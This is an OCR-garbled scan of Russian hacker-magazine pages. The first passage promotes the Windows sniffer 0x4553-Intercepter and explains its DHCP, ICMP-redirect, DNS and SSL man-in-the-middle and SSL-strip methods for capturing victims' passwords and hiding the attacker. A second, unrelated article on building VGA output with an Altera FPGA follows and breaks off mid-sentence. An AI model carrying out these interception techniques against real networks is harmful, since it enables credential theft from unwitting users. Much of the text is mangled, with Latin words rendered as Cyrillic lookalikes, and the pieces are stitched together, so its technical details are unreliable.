О том, что снифер ОхДББЗ-ІпІегсерІег — 
инструмент исключительный, писал еще Крис 
Касперски в далеком 2008 году. С тех пор этот 
чумовой виндовый снифер обзавелся еще более 
убойным функционалом для реализации МІТМ-атак. 
В том числе техниками для перехвата паролей, 
которые должны передаваться по 55І_. 



Снифер + МІТМ-атаки 

0x4553- 1 пСе гсерСег 
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Снифер + МІТМ-атаки = ОхДббЗ-ІпІегсерІег 




0х4553-ІпІегсерІег показывает перехваченные пароли 



В ЧЕМ УНИКАЛЬНОСТЬ ІЫТЕРСЕРТЕР? 

Достойных сниферов с таким огромным багажом реализованнных атак 
под ѴѴіпсІоѵѵз почти нет. На то есть несколько причин. Основная пробле- 
ма заключается в отсутствии штатных инструментов маршрутизации. 
Если в каждом ипіх'е есть средства типа ірІіаЫез, при помощи которых 
можно без труда добавить необходимые правила перенаправления 
пакетов, то в винде, а тем более в ее клиентских версиях, ничего подоб- 
ного нет. Естественно, писать свой ІЧАТ (или упрощенный ір {огѵѵагбег] 
ради какого-то единичного примера мало кто станет. Различные 
техники под ѴѴіпсІоѵѵз представлены, как правило, в виде простеньких 
ргоо{ о{ сопсер* и не более. Впрочем, чего таить, и под ипіх сложно найти 
что-то похожее на Іпіегсер^ег. Тот же самый еиегсар под ипіх состоит из 
различных приложений: одно отвечает за агр-спуфинг, другое — за гра- 
бинг паролей, а ззізігір и вовсе самостоятельное приложение. Все это 
требует ручной настройки из-под консоли. Получается, что и под ипіх, 
даже при всей мощи доступных инструментов, нет ни одного достойного 
6111-приложения, которое совмещало бы в себе все сразу. Іп1егсер1:ег 
же является таким инструментом и содержит в себе целый набор от- 
тестированных и законченных техник сетевых атак. К примеру, недавно 
реализованные техники 331 МІТМ и 55І_ Зігір для перехвата паролей, 
которые должны бы передаваться по защищенному соединению, могут 
использоваться с любым из имеющихся МІТМ'ов: АРР, ІСМР, 0Ы5 оѵег 
ІСМР, ОНСР. Во всех случаях используется скрытная маршрутизация 
через не существующие в сети ІР- и МАС-адреса, таким образом, жерт- 
вы не смогут определить источник нападения. Сегодня мы не будем 
останавливаться на базовом функционале снифера (РОР-версию статьи 
Криса ты можешь найти на диске), а коснемся самого сочного — новых 
техник, которые недавно появились в 0х4553-1п1:егсер*ег. 

НОВИНКИ ФУНКЦИОНАЛА 

Последний раз Іпіегсеріег обновлялся чуть больше года назад. 
Тогда-то и было создано основное подспорье для различных МІТМ- 



атак. С версии 0.8 в состав Іп*егсер1:ег добавился так называемый 
0х4553-МАТ. Это полноценный ІЧАТ, не требующий установки и зани- 
мающий пару сотен килобайт, которым можно раздавать интернет в 
небольших локальных сетях или дома. Он поддерживает трансляцию 
пакетов из еіЬегпеІ: в РРРоЕ-соединение А05І_-модема и трансляцию 
РТР-сеансов. Помимо этого была реализована давно задуманная 
атака на сети с ОНСР — ОНСР МІТМ. И вот сейчас, спустя долгое вре- 
мя, вышло еще несколько довольно крупных обновлений, реализую- 
щих новые интересные техники атак. 

1. ІСМР Ресіігесі МІТМ. Эта малораспространенная техника перехвата 
трафика имеет довольно узкое применение, позволяя перехваты- 
вать данные между единичными хостами. 

2. 0145 оѵег ІСМР МІТМ. Совершенно новая техника, раскрывающая 
весь потенциал ІСМР Неб ігесС Перехватывая клиентский О N5- 
сервер, мы можем перехватить все соед и нения с хоста ми, которые 
были отрезольвены через 0Ы5. 

3. 55І.МІТМ. Классическаятехника подмены сертификатов, позво- 
ляет перехватывать да иные любых протоколов, защищенных при 
помощи 331 (поддерживаются 55І_ѵ2, 55І_ѵЗ, ТІ_5ѵ1]. 

4. 55І_5ігір. Практически не встречающаяся техника под ѴѴіпсІоѵѵз. 
Аналог известного ззізігір под ипіх. 

Каждая из этих техник заслуживает внимания, но начать я хочу с 
описания атаки ОНСР МІТМ, которая появилась еще год назад. 

ОНСР МІТМ 

Суть атаки проста как пять копеек. Существуют различные 
схемы поведения йНСР-клиентов. Мы рассмотрим классический 
вариант. Когда компьютер входит в сеть, он шлет сообщение 
ОНСР Оізсоѵегу, требуя выдать ІР-адрес и выслать действующую 
конфигурацию сети, включая шлюз по умолчанию. Наша задача 
— выдать поддельный ответ ОНСР ОНег, в котором будетуказана 
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наша конфигурация с нашим шлюзом. Так трафик пойдет через 
наш ЫАТ и мы сможем беспрепятственно его слушать. Данная ата- 
ка вскользь описана в теории, реализована в еиегсар, улучшена 
и автоматизирована в 0х4553-1п1егсер1ег. Для проведения атаки 
пришлось решить ряд сложных вопросов: 

1. Неизвестностьколичества существующих компьютеров в сети и 
ихпривязка кІР-адресам. Можетпривести кпроблемам всети и 
истощению ВНСР-пула. 

2. Борьба за первенство с легитимным ВНСР-сервером. 

3. Возвратконтроля наджертвой, уведенной легитимным сервером. 

Вся магия кроется в решении этих проблем. 

1. Чтобы не порождатьпроблемы в действующей сети, мы перена- 
правляем всех клиентов в виртуальную сеть, отделенную от дей- 
ствующей. Для поддержания связи с реальной сетью и внешними 
ресурсами во всей красе раскрывается 0х4553-МАТ, регулирующий 
маршрутизацию. 

2. Благодаря рядутестов было выявлено, что ОНСР-сервер в 

I пііегсеріег с использованием ѴѴіпРсар работает быстрее других. Он 
оказался быстрее ОНСР-службы ѴѴіпсіоѵѵб 5егѵег 2003, быстрее по- 
пулярного приложения ШрсШ и быстрее В НСР- серверов, встроен - 
ныхв АВЗБмодемы. Помимоэтого, ВНСРв Іп*егсер*ег пропускает 
целый шаг согласования параметров вовремя передачи конфигу- 
рации клиенту, что существенно повышает скорость реагирования 
и выдачи ложной информации. 

3. Возможна ситуация, что легитимный ОНСР-сервер все-таки от- 
ветит быстрее нас. Такая ситуация была искусственно создана. 

И для ее решения пред приняты дополнительные действия. 
После принятия конфигурации клиентдолжен еще раз пере- 
проверить, незаняллиончей -то адресв сети, чтобы избежать 
конфликта ІР-адресов. Для этого он отсылает в сеть специаль- 
ный пакетдгаіиііоизагр. Если в сети уже имеется компьютер с 
таким адресом, клиент вновь пошлет ОНСР Віэсоѵегу с просьбой 
выделить другой адрес. Если же никаких ответов на запрос 

не пришло, значит, данный ІР свободен. При потере клиента, 
Іп1:егсер*ег следит за пакетами дгаіиііоиз агр и отвечает клиен- 
ту, говоря, что запрошенный адрес занят, для того чтобы вновь 
вызвать голосование и попытаться успеть выдать ложную кон- 
фигурацию. Данная атака детально рассмотрена в видео ЗпіНіпд 
бНср ЬазесІ пе^ѵѵогк. 

ІСМР РЕйІРЕСТ МІТМ И РЫБ ОѴЕР ІСМР МІТМ 

Следующие две техники используют для атаки особенности ІСМР- 
протокола. Не вдаваясь в технические подробности сути и назна- 
чения сообщений ІСМР Несіігесі, отмечу, что эти ІСМР-сообщения 
позволяют добавить запись в таблицу маршрутизации удаленного 
узла. В записи должен содержаться ІР-адрес хоста и ІР-адрес 
шлюза, через который следует слать пакеты к указанному ресурсу. 
Например, зная, что некий зі^е.сот имеет адрес 1.2. 3.4, мы можем 




551. МІТМ. Настройка 0х4553-МАТ 



КРАТКО О 0Х4553-ІІМТЕРСЕРТЕВ 



• Перехватывает пароли и хэш-суммы для огромного 
количества сервисов: I СО/І Р С/АІ М/РТ Р/І М А Р/РО РЗ/5 М ТР/Б ОАР/ 
В N С/БО СКБ/НТТР/ѴѴѴѴѴѴ/М ЫТР/С Ѵ5/ТЕ БИ ЕТ/М Р А/О С++/ѴМ С/ 
МѴ5СІІ_/0НАСІ_Е. 

• Перехватывает сообщения большинства известных мессенжеров: 

I СО/АІ М/ЗА В В Е Р/УА Н ОО/М БИ/ѲАВ БІ - ОАО БІ/І РС/М Р АІ . 

• Реконструирует 5МТР/РОРЗ сообщения. 

• Сканирует л окал ку на наличие живых узлов с помощью 
широковещательной рассылки АРР-запросов (АРР 5САКІ). 

• Ищет в сети ОНСР-серверы (ВНСР 0І5С0ѴЕРУ). 

• Находит в локалке другие сниферы (РР0МІ5СБІ0БІБ ЗСАКІ). 

• Поддерживает подмену МАС-адреса для І_АІ\І-адаптеров. 

• Может работать в режиме «экстремального» сканирования 
(еХ*гете тосіе], при котором сниферу достаточно указать целевой 
протокол без специфицирования порта. 0х4553-ІпІегсер1:ег будет 
просматривать весьтрафик, автоматически «вылавливая» 
пакеты, относящиеся к данному протоколу путем анализа их 
содержимого. 

• Поддерживает РАѴѴ-режим. 

• Выполняетудаленный снифинг трафика через РРСАР- 
демона, устанавливаемого на І_іпих/хВ5В или ѴѴіпсІоѵѵз-узлах 
(предпочтительнее всего — на шлюзе]. 

• Включает в себя собственную реализацию ІЧАТ. 

• Реализует несколько МІТМ-атак: АРР МІТМ, ВЫЗ оѵег ІСМР МІТМ, 
ОНСР МІТМ. 

• Перехватывает ЗЗБпароли через 55І_ МІТМ + 55І_ Зігір. 



послать жертве сообщение, в котором будетуказано, что до 1.2. 3.4 
нужно идти через наш шлюз, где запущены Іпіегсер^ег и ІЧАТ. Это и 
есть техника ІСМР Песіігесі МІТМ. Ксожалению, мы не можем пере- 
направить разом все хосты, поэтому данную атаку можно использо- 
вать для целевого перехвата конкретного узла. Однако в Іпіегсеріег 
реализована техника, которая позволяет сильно расширить область 
применения перехвата с помощью сообщений ІСМР ПесІігесС Это ВЫЗ 
оѵег ІСМР ПесІігесС 

Вместо згіе.сот мы будем перенаправлять трафик от клиентского 
ВЫЗ-сервера. Цепная реакция запускается всего одним пакетом. 
Сначала мы шлем жертве сообщение, что до его ВЫЗ-сервера нужно 
идти через наш шлюз, затем в бой вступает 0х4553-І\ІАТ, который на- 
чинает обрабатывать ВЫЗ-ответы. Например, жертва хочет отрезоль- 
вить зііеі.сот, — ІЧАТ перенаправляет запрос к серверу, принимает 
ответ и вытаскивает все ІР-адреса, отвечающие за зі^еі.сот, после 
чего посылаетжертве новые сообщения ІСМР РесІігесС говоря, что ко 
всем отрезольвенным ІР-адресам нужно идти через наш шлюз. Если 
жертва посылает запрос к 5І*е2.сот, ситуация повторяется. Таким 
образом, весь интернет-трафик начинает идти через Іп1:егсер1:ег и 
МАТ. 

Правда, тут есть одно важное условие. Чтобы показать его, рас- 
смотрим пример сетевой конфигурации жертвы: 

ІР-адрес жертвы - 192.168.1.10 
ІР-адрес шлюза - 192.168.1.1 
ІР-адрес РЫБ - 192.168.1.2 
маска - 255.255.255.0 

При такой конфигурации перенаправить ВЫЗ-сервер мы не 
сможем. Он обязательно должен находиться за рамками данной 
подсети, — это обусловлено самим протоколом ІСМР. А вот если ис- 
пользуется напрямую внешний сервер (например, гугловский 8. 8. 8. 8), 
то препятствий для атаки нет. 
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Снифер + МІТМ-атаки = ОхДббЗ-ІпІегсерІег 



АТАКИ НА 551 



551. МІТМ 

Эта атака описана множество раз, поэтому останавливаться подроб- 
но на ее описании мы не будем, а расскажем, как она реализована 
конкретно в ІпІегсер1:ег. Ядром всех МІТМ-атак в I п1егсер1;ег, как мы 
уже говорили, является ІЧАТ. Именно он отвечаетза маршрутизацию 
пакетов и дополнительные действия для реализации каждой из 
атак. Стандартно в него зашит перехваттаких протоколов: 

• НТТРЗ — 443; 

• Р0Р35 — 995; 

• 5МТР5 — 465; 

• ІМАР5 — 993. 



СопГідигаІіоп 



ТітеоіЛ 



1^ Рготізс I? РТР 
Г ОНСР 

Г йевйМСМР Г ЗЗІрогі 

Г 5$1 МІТМ (7 $51 | от 
(V 5$1 Бігір 



Конфигурации 0х4553-МАТ 



Послезапуска 0х4553-МАТ он открываетуказанные порты на локаль- 
ном интерфейсе и ждет входящих соединений. Весь трафик жертвы 
по указанным протоколам перенаправляется на ранее открытые нами 
порты. На этом этапе происходитследующее: 

• В случае НТТРЗ ІЧАТ п ри ни мает входя щееіср-соед и нение, делает 
запрос к запрашиваем ому ресурсу и получает его сертификат. 
Затем он подменяет ключ шифрования на свой и устанавливает 
соединение с жертвой, выдавая себя за оригинальный сервер. 
После этого происход ит прокси рование данных между двумя 
соединениями. 

• Для других протоколов шагзапроса оригинального сертификата 
опущен, — в место этого мы посылаем ранее сгенерированный 
статичный сертификат. Таккакнаши сертификаты неявляются 
подписанными доверенными центрами, у пользователя будет вы- 
скакивать предупреждение. В этом и заключается основной минус 
даннойтехники. 

Кроме приведенных выше протоколов, пользователь может доба- 
вить любой другой порт. О том, как это сделать, написано в руковод- 
стве к сниферу. Так как сама атака проводится при помощи МАТ, то 
непосредственно Іп^егсеріег не видит зашифрованых данных. Чтобы 
он их увидел, ІЧАТ делает следующую хитрость: весь исходящий 
55І_-трафик дублируется в сеть в открытом виде, после чего пароли 
появляются в окне снифера. 

55І.5ТРІР 

О технике 55І_ Зігі р мы подробно писали в #125 номере (РОР-версию 
статьи ты найдешь на диске]. Собственно говоря, непосредственно 
с перехватом 55І_ эта техника не связана. Перехватывать необхо- 
димо обычный НТТР-трафик, анализируя его на Шрз-ссылки. Воз- 
можно ты помнишь, сколько возни было, чтобы заставить эту схему 
работать под ипіх, используя разработанную Мокси Марлинспайком 
утилиту ззізігір. Все что нужно сделать в Іп*егсер*ег для выполне- 
ния атак 55І_ Зітір или 55І_ МІТМ, — это поставить соответствую- 
щую галочку и перенаправить трафик жертвы любым доступным 
способом. В данном случае весь веб-трафик перенаправляется на 
локальный 80-й порт, откуда и происходит дальнейшее проксиро- 
вание соединений. Выполняя данную атаку, мы опять же стал- 
киваемся с рядом сложностей, которые необходимо преодолеть. 




Во время проведения атаки 551. Зігір у клиента меняется Таѵісоп 

Расскажу об этом подробнее. Для начала нам элементарно нужно 
видеть входящий трафик в текстовом виде, иначе никаких ссылок 
мы не найдем. Все дело в том, что для снижения нагрузки и увели- 
чения скорости передачи данных в большинстве случаев пакеты 
сжимаются такими алгоритмами как дгір или сІеЛа^е. О возможности 
принимать такие пакеты веб-браузер сообщает серверу в соответ- 
ствующем поле ѵѵеЬ-запроса. Первым шагом является модификация 
поля Ассеріі-Епсосііпд, после которого весь текст посылается в от- 
крытом виде. Также необходимо заменить безопасные куки, иначе 
возникнут трудности с установлением сессий, например на том же 
дтаіі. Ищем флаг Зесиге и заменяем его на НирОпІу. Теперь можно 
заменять Шрз-ссылки их небезопасным аналогом Шр. Далее 
при запросе измененного Шрз-урла мы устанавливаем Шрз- 
соединение с оригинальным ресурсом и проксируем данные между 
клиентом и сервером. Чтобы сбить бдительность пользователя, 

I піегсерііег подменяет {аѵісоп, выдавая иконку с замочком, который 
имитирует безопасное соединение. На данный момент 1п*егсер*ег 
не убивает сессии для принудительной повторной авторизации, как 
это может делать оригинальный ззізігі р, но такая опция будет, воз- 
можно, добавлена в будущем. Еще можно выделить одно отличие 
данной реализации 55І_ 5*гір от ее ипіх-аналога. Оригинальный 
ззізігір работает как прокси, определяя куда производится соеди- 
нение из заголовка ѵѵеЬ-запроса. Это вынуждает разрешать имя 
сервера через сіпз и хранить свой собственный сіпз-кеш. В нашем 
случае в этом нет необходимости, так как адрес назначения из- 
вестен, — это 0х4553-МАТ, который и осуществляет маршрутизацию 
трафика жертвы. ШИ 
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Монитор 
к каждой 
железке! 



ДЕЛАЕМ Ѵ6А-ВЫХ0Д НА РРСА 



Когда начинаешь учиться программированию, 
прежде всего интересует графика. Увлекает 
наглядность и видимый результат. Эта 
стадия не миновала и мое увлечение 
микроконтроллерами, но, к моему удивлению, 
модулей для вывода текста на экран Ѵ6А- 
монитора не нашлось, вернее, не устраивали 
результаты! Пока взгляд не упал на ПЛИСы — 
которых такая задача в тупик не ставит! 



ПРАВИЛЬНЫМ ПУТЕМ 



Если в поисковике набрать, к примеру, «ѵда а1:теда», сразу же на- 
ходим страничку Максима Ибрагимова, который на Аітеда сумел 
добиться разрешения 640 на 480 и количества символов 20x20. Реко- 
мендую данный материал всем, кто хочет разобраться в Ѵ6А-режиме. 
Но мне хотелось большего — нужен был режим 80x40 символов, 
желательно с возможностью задавать цвета символов и фона. Когда 
я попытался реализовать Ѵ6А на платформе агт7 с частотой 100 
МГц и не добился решения поставленной задачи, появилось смутное 
ощущение, что я иду не той дорогой :(. 

К ПЛИСам присматривался давно, но никогда ими не занимался. 
Что же, пришло время открыть новые горизонты! 



КАКУЮ ПЛИС ВЫБРАТЬ И ГДЕ КУПИТЬ? 



ПЛИСы бывают двух типов — СРЮ и РР6А. В первом типе присут- 
ствует встроенная память для хранения программы, но считается, 
что СРЮ уступает РР6А по внутреннему устройству. В РР6А для хра- 
нения программы используется внешняя энергонезависимая память, 
что требует дополнительной схемы на плате. Но меня это не испуга- 
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Монитор к каждой железке! 



ло, тем более что пайка мелких деталей радости мне не доставляет. 

Я решил воспользоваться готовой отладочной платой. 

На еЬаѵ.сот набрал РР6А и принялся изучать предложенные 
варианты. Остановился на такой плате — взял подешевле, к тому же 
на ней уже был разъем Ѵ6А! Кроме этих вкусностей, присутствовали: 
1 мегабит внешней оперативной памяти, 8 светодиодов, 8 семисег- 
ментных индикатора, СОМ-порт, 2 порта Р5/2 для подключения мыши 
и клавиатуры, 4 кнопки, динамик — что еще надо? Да, самое главное 
чуть не забыл — стояла ПЛИС АКега Сусіопе ЕР1С6 с 5980 логиче- 
скими ячейками (важный параметр — чем больше ячеек, тем более 
сложную программу сможешь разработать) и 90 килобит оперативной 
памяти. Работает плата на частоте 50МГц, но, используя модули РІ_І_ 
(а их у нас 2), можно добиться частоты 320МГц. Мы модули РІ_І_ ис- 
пользовать не будем, нам хватит имеющейся частоты. 

Не забудем и про программатор — хотя в сети и присутствуют 
схемы самодельных устройств, я решил, что 8$ — разумная цена за 
сей замечательный девайс. Я оплатил его и стал ждать. 



А В ЧЕМ И НА ЧЕМ МЫ БУДЕМ ПРОГРАММИРОВАТЬ?! 



Все пришло в исправном состоянии (что говорить, порадовали ки- 
тайские товарищи), а вместе с платой пришло три (!) йѴй -диска: 

• Описание языков программирования 

• Программное обеспечение фирмы АКега 

• Схема и описание платы, примеры программ, заточенные именно 

под эту плату! 

Можно было бы установить среду разработки с пришедшего 
диска, но мы же уважаем авторские права (особенно если эти 
права защищены кряком на китайском языке, в котором я не разо- 
брался :)). Но нам действительно ни к чему крякнутые профессио- 
нальные программы, если АКега выпустила бесплатный продукт 
под названием ОиагІизІІ ѴѴеЬ ЕсІШоп Зо^ѵѵаге. На момент написа- 
ния статьи была доступна уже версия 11.0, я же скачал и устано- 
вил 9.1 с сервис-паком 2. Этого вполне достаточно для реализации 
самых смелых идей. 

Установка и начало работы не вызывает проблем, но если для 
вас РР6А и АІІега являются темным лесом (как для меня), то всем 
начинающим рекомендую ресурс тагзоііосі.ога . Создатели сайта 
проделали гигантскую работу, все подробно описали для начинаю- 
щих, за небольшую плату предлагают отладочный набор на базе 
ЕРМ240Т100С5, выкладывают различные проекты. Более того, они 
же выложили в открытый доступ «Введение в Ѵегііод», прочтения 
которого вполне достаточно для эффективного старта. Скачать все 
можно по ссылке доо.оІ/2аСОа . Лично мне ничего больше не пона- 
добилось для разработки устройства. Хотя я выбрал Ѵегііод, ничто 
не мешает использовать другой язык описания схем — ѴН0І_. Более 
того, модули, написанные на этих двух языках, очень легко исполь- 
зовать в одном проекте! Такой легкости интеграции я до сих пор в 
программировании не встречал! 

Немного отвлекусь — литературы по ѴН0І_ или Ѵегііод катастро- 
фически мало, особенно по Ѵегііод'у. А та, что есть, стоит довольно 
больших денег и зачастую не переведена с английского языка. Сеть, 
конечно, выручает, но хорошую книгу еще ничего не заменило. 




рис. 1. Распиновка Ѵ6А со стороны видеокарты 




Рис. 2. Отладочная плата на базе ПЛИС АІІега 



2. 


БРЕЕМ 


Зеленая составляющая цвета 


3. 


ВШЕ 


Синяя составляющая цвета 


4. 


РЕ5 


Зарезервированно 


5. 


БЫй 


Земля 


6. 


РбЫй 


Земля для красного цвета 


7. 


66М0 


Земля для зеленого цвета 


8. 


ВбЫй 


Земля для синего цвета 


9. 


КЕУ 


Не используется 


10. 


56Ы 


Земля для синхроимпульсов 


11. 


ЮО 




12. 


5йА 




13. 


Н5УМС 


Горизонтальный синхроимпульс 


14. 


ѴБУЫС 


Вертикальный синхроимпульс 


15. 


5СІ_ 





Выходы разъема ѴСА 



ТЕОРИЯ Ѵ6А. 



Прежде чем приступать к программированию, надо разобраться 
в том, что такое Ѵ6А. Данный стандарт был разработан в 1987 и 
является последним стандартом, которому следовало большинство 
производителей. 

Стандартным разъемом является 15-пиновый коннектор. На 
рисунке 1 ты можешь увидеть распиновку со стороны видеокарты. 
Назначение сигналов приведено в таблице 1. 

Проще всего работу Ѵ6А представить себе так: по экрану слева 
направо бежит луч (что справедливо для мониторов с электронно- 
лучевой трубкой). Цвет луча складывается из сигналов НЕБ, БРЕЕИ 
и ВШЕ, которые физически задаются напряжением на соответ- 
ствующем пине от 0 до 0.7 вольт (хотя современные мониторы легко 
переносят подачу напряжения до 5 вольт). Правило очень простое: 
чем выше напряжение, тем больше цвета используется в итоговом 
сигнале. Нет напряжения — цвет не используется вовсе. 

Когда луч доходит до правого края экрана, необходимо дать гори- 
зонтальный синхроимпульс, когда достигает правого нижнего угла — 
выставляем вертикальный импульс. Землю для синхроимпульсов 
можно взять с 5-го пина — все будет работать без проблем (это для 
тех, кто захочет сам спаять видеогенератор). 
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Максимальным разрешением является режим 640x480 с частотой 
60 кадров в секунду. Для нашего удобства отойдем от временных 
интервалов и будем оперировать пикселями (при генерации одной 
строки] и строками (при генерации одного кадра]. 

Для генерации одной строки воспользуемся следующими данными: 

• 8 пикселей — передний отступ; 

• 96 пикселей — сигнал НЗѴКІС; 

• 40 пикселей — задний отступ; 

• 8 пикселей — левый бордюр; 

• 640 пикселей — видеоданные; 

• 8 пикселей — правый бордюр. 

Итого получается 800 пикселей на строку. 

При генерации одного кадра используем уже строки: 

• 2 линии — передний отступ; 

• 2линии — сигналѴЗѴІЧС; 

• 25 линий — задний отступ; 

• 8линий — верхний бордюр 

• 480 линий — видеоданные; 

• 8линий — правый бордюр. 

Итого получается 525 строк на экран. 

Осталось посчитать, сколько пикселей в секунду нам необходимо 
сгенерировать. Формула проста до безобразия (а также во время 
безобразия и после безобразия :]] — количество кадров (60] * коли- 
чество строк в каждом кадре (525] * количество пикселей в каждой 
строке (800]. Итоговая частота генерации равна 25.2 МГц. Забегая 
вперед, скажу, что я округлил до 25 МГц и все прекрасно заработало. 



отелов к делу 



Логика действия программы такова: по СОМ-порту получаем данные 
для отображения на экране. Каждый символ кодируется двумя 
байтами — собственно код символа, первые четыре бита второго 
байта — цвет символа, вторые четыре бита — цвет фона. Каждый 
полученный байт из СОМ-порта записываем последовательно в 
оперативную память. Если дошли до конца экрана — возвращаемся 
в начало. Модуль отображения символов на экране берет данные из 
памяти и отображает их на монитор. Более подробно алгоритм ото- 
бражения разберем позднее. 



В языке Ѵегііод структурной единицей для написания частей 
программы является модуль. У модуля могут быть входы, выходы 
и двунаправленные линии — их проще представлять как провода, 
которыми мы подсоединяемся к другим модулям или к физическим 
ножкам ПЛИС, получая в итоге готовую программу. Удобство и про- 
стота такого подхода заключается в том, что мы без проблем можем 
использовать созданный модуль в других проектах, а также пользо- 
ваться сторонними модулями. 

Итак, нам надо создать (или найти :]] следующие модули: 

• Делитель частоты — необходимо понизить 
имеющиеся 50 МГц до 25 МГц. 

• Модуль для работы с СОМ-портом 

• Модуль, берущий данные из СОМ-порта и записывающий их в 
оперативную память 

• Модуль для работы с памятью 

• Модуль для формирования ѴОА-сигнала 

Делитель частоты (сІіѵісІе_сІк) 

Это самый простой модуль, в своем роде классика жанра. Имеет- 
ся входная линия с частотой 50 МГц и выходная, на которой мы до- 
биваемся 25 МГц. Внутри модуля объявлена переменная зі, к которой 
каждый новый такт прибавляется по единице. Каждый четный такт 
ставим высокий уровень на выходе, каждый нечетный — убираем. 

Модуль для работы с СОМ-портом (а5упс_гесеіѵег) 

СОМ -порт знаком каждому программисту. Удобный и простой, он 
даже сейчас не сдает позиций и неудивительно, что для воплоще- 
нии в ПЛИС было создано немало готовых модулей. Тот, которым я 
воспользовался, был найден на ресурсе {рда4{ип.сот ( ѵѵѵѵ\л/Трда4іип. 
сотЛіІез/азѵпс.гір ]. Кроме самого модуля, на этом ресурсе ты 



ИМЕЕТСЯ ВХОДНАЯ ЛИНИЯ С 
ЧАСТОТОЙ 50 МГЦ И ВЫХОДНАЯ, НА 
КОТОРОЙ МЫ ДОБИВАЕМСЯ 25 МГЦ 
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Монитор к каждой железке! 




рис. 3. Инициализация памяти 



найдешь описание протокола, написанное на простом и доступном 
языке. Обрати внимание, что приемная и передающая часть порта 
реализована двумя отдельными модулями, что очень удобно — не 
надо тратить ресурсы на то, что не требуется! 

Использовать модуль легко — всего две входящих линии: 
частота (которую мы берем из модуля сі і ѵі сі е_с I к) и РХ (которую 
мы подсоединяем к физической ноге ПЛИС). Среди выходных 
параметров нам нужны только РхО_епсІо*раске* (сигнал окончания 
пакета — становится выше на один такт после приемки очередно- 
го байта) и РхО_сІа*а — шина из 8 линий, на которые выставлены 
полученные данные. Модуль уже настроен на частоту 25 МГц с 
параметрами СОМ-порта 115200:8:М:2. Вот и все. Обрати внима- 
ние на мощь ПЛИС-ов — откомпилированный модуль занимает 50 
логических ячеек из 5980. То есть ты можешь легко развернуть 
50 полновесных портов на одном кристалле, и работать они будут 
независимо друг от друга! 

Модуль, берущий данные из СОМ-порта и записывающий их в 
оперативную память (\л/гі*е_тетогу). 

Предназначение модуля незамысловато — при получении нового 
байта (входная линия еп становится равной единице) взять данные 
из СОМ-порта (входная шина ба*а_іп), к внутренней переменной 
ро5_оГ_ѵѵгі1:е прибавить единицу (позиция для записи), после чего 
на выходных линиях асісігезз и ба*а_ои* выставить соответственно 
адрес значение записи. Для того чтобы сообщить модулю памяти о 
необходимости записи, выставляем «1» на выходной линии ѵѵг_еп. 

Чтобы было проще разобраться в модуле, поделюсь секретом. Па- 
мять у меня поделена следующим образом: с 0 по 3071 байт хранится 
шрифт, а с 3100 байта по 9499 — коды символов и их цветов. Теперь 
темных мест не должно быть совершенно! 

Модуль для работы с памятью (тетогу) 

Работа с оперативной памятью отличается оттого, к чему я при- 
вык, программируя на языках высокого уровня. Нельзя объявить 
таззіѵ[1000] и обращаться к каждому элементу массива. Но обо 
всем по порядку. Первое, что должен сделать каждый новичок, 
изучающий работу с памятью, — сказать небольшой документ «РАМ 
Меда*ипс*іоп ІІзег биісіе» по ссылке изегз.есе.да*есН.еби/~ІіатЬІеп/ 
ЦРЗ/ид гат.рсІГ Самое главное, что мы узнаем оттуда, — использо- 
вать оперативную память можно 4 способами: 

• Простой порт РАМ (Віпдіе рог* РАМ) — использует одну шину для 
указания адреса чтения или записи. 

• Простой порт РАМ (Віпдіе рог* РАМ) — использует разные шины 
для указания чтения или записи. 

• Простой двойной порт (5ітрІе сі иа I -рог* РАМ) — используется две 
шины для чтения и одну для записи. 

• Тройной порт РАМ(Тгі-з*а*е РАМ) — похож на предыдущий, про их 
различия в документации нет ни слова. 



Так как нам надо одним модулем записывать данные, а другим — 
читать их, то идеальным выбором будет простой порт РАМ (Віпдіе 
рог* РАМ) с отдельными шинами для чтения и записи. Выбрать мы 
выбрали, что делать дальше? 

Вот и пришло время познакомиться с такой замечательной воз- 
можностью среды программирования как МедаѴѴііагсІ. С его помо- 
щью мы в считанные минуты создадим объект для работы с памятью. 
Смело выбираем пункт меню ТооІз^МедаѴѴігагсІ РІид-іп тападег. 

На первом шаге указываем, что мы хотим создать новый экземпляр 
(Сгеа*е а пеѵѵ сіі5*от теда*ипс*іоп ѵагіа*іоп). Также здесь есть воз- 
можность указать, что мы хотим отредактировать уже существующий 
вариант. Воспользуемся этой возможностью позже. 

На втором шаге указываем, что мы, собственно, хотим делать. 

Из списка в левой части указываем Метогу СотріІег^РАМ:2РОРТ. 
Также указываем тип ПЛИС, имя выходного файла и язык, на котором 
должен быть сгенерирован файл. Последнее не столь важно, все за- 
работает независимо оттого, какой язык выбран. 

На следующем шаге на картинке виден будущий модуль и его 
входы/выходы. Выбираем порт с одним входом и одним выходом 
(ѴѴі*Н опе геасі рог* апб опе ѵѵгі*е рог*), а также указываем, что память 
нужно представлять как набор слов (Аз а пиітіЬег о* ѵѵогсіз). 

Жмем Ыех* и на последнем для нас (но не в настройках) шаге в 
пункте «Ноѵѵ тапу 8-Ы* ѵѵогсіз о* тетогу?» ставим значение 10000 
(т.е. 80000 бит — используем почти всю память). Нажимаем РіпізІі, со- 
глашаемся с набором файлов — все, объект готов. 

Рассмотрим его входы и выходы: 

• сіоск — частота для работы; я ее взял прямо от генератора 50 МГц 
для скорости работы. Вообще, памятьможетработатьна частотедо 
320МГц. 

• гсіасісігезз и ѵѵгасісігегг — шины для указания адресов чтения и за- 
писи соответственно. 

• сіаіа — данные для записи. 

• ѵѵгеп (ѵѵгіІеепаЫе) — если линия равна «1»,то в память по адресу 
ѵѵгасісігезз записываются данные сІа*а. 

• ц — данные, которые прочитаны по адресу ѵѵгасісігезз. Линию для 
разрешения чтения я не указывал, хотя такая возможность су ще- 




рис. 5. Окно назначения выходов Ріп РІапег 



ХАКЕР 11 /154/2011 



043 







РНКЕАКШ6 




рис. 6. Программатор 




рис. 7. Конвертация дампа памяти 



ствует. После выставления адреса ѵѵгасісігезз данные ц появляются 
через такт (это справедливо для частоты 50 Мгц; нужно быстрее — 
используй РІ_І_). 

Казалось бы, объект готов к работе, но, как помнишь, помимо симво- 
лов в памяти хранится и шрифт. Его можно было бы загружать динами- 
чески каждый раз при запуске платы, но меня такой путь не устроил. К 
счастью, есть возможность инициализировать память при прошивке! 

Для инициализации памяти можно использовать 2 формата 
файлов: Іп{еІ Нех и ті{ (тетогу іпіііаіігаііоп {огтаі]. Так как шрифт 
представлен в двоичном виде (я взял его у упомянутого уже Максима 
Ибрагимова; каждый символ представлен битовой матрицей 8x12), 
то ІпіеІ Нех отпадает сам собой. Разберем, что из себя представляет 
формат тіТ 

Это обычный текстовый файл, в котором указываем следующие 
параметры: 

РЕРТН = 3072; объем памяти в словах 

